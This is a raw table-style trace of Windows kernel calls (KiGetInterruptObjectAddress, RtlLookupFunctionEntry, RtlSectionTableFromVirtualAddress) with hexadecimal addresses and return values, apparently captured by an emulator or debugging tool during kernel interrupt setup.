| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4410 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8220, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4418 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8228, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4420 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8230, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4428 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8238, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4430 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8240, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4438 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8248, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4440 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8250, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4448 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8258, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4450 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8260, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4458 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8268, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4460 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8270, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4468 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8278, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4470 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8280, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4478 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8288, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4480 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8290, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4488 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8298, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4490 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4498 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82a8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44a0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44a8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82b8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44b0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44b8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82c8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44c0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44c8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82d8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44d0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44d8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82e8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44e0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44e8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c82f8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44f0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8300, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a44f8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8308, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4500 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8310, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4508 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8318, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4510 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8320, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4518 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8328, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4520 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8330, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4528 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8338, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4530 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8340, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4538 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8348, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4540 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8350, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4548 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8358, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4550 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8360, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4558 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8368, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4560 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8370, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4568 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8378, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4570 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8380, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4578 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8388, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4580 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8390, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4588 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8398, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4590 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4598 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83a8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45a0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45a8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83b8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45b0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45b8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83c8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45c0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45c8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83d8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45d0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45d8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83e8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45e0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45e8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c83f8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45f0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8400, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c75b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8128 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a45f8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8408, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4600 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8410, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4608 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8418, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c77a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8134 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4610 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8420, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c77a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8134 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4618 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8428, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4620 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8430, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4628 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8438, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4630 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8440, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4638 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8448, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c75b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8128 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4640 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8450, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c75b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8128 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4648 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8458, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4650 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8460, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4658 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8468, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4660 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8470, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4668 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8478, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4670 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8480, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4678 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8488, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7b70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c814c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4680 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8490, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ca650, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c826c |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4690 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c75b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8128 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4698 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84a8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c75b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8128 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46a0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46a8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84b8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46b0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46b8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84c8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46c0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46c8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84d8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46d0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46d8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84e8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46e0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46e8 |
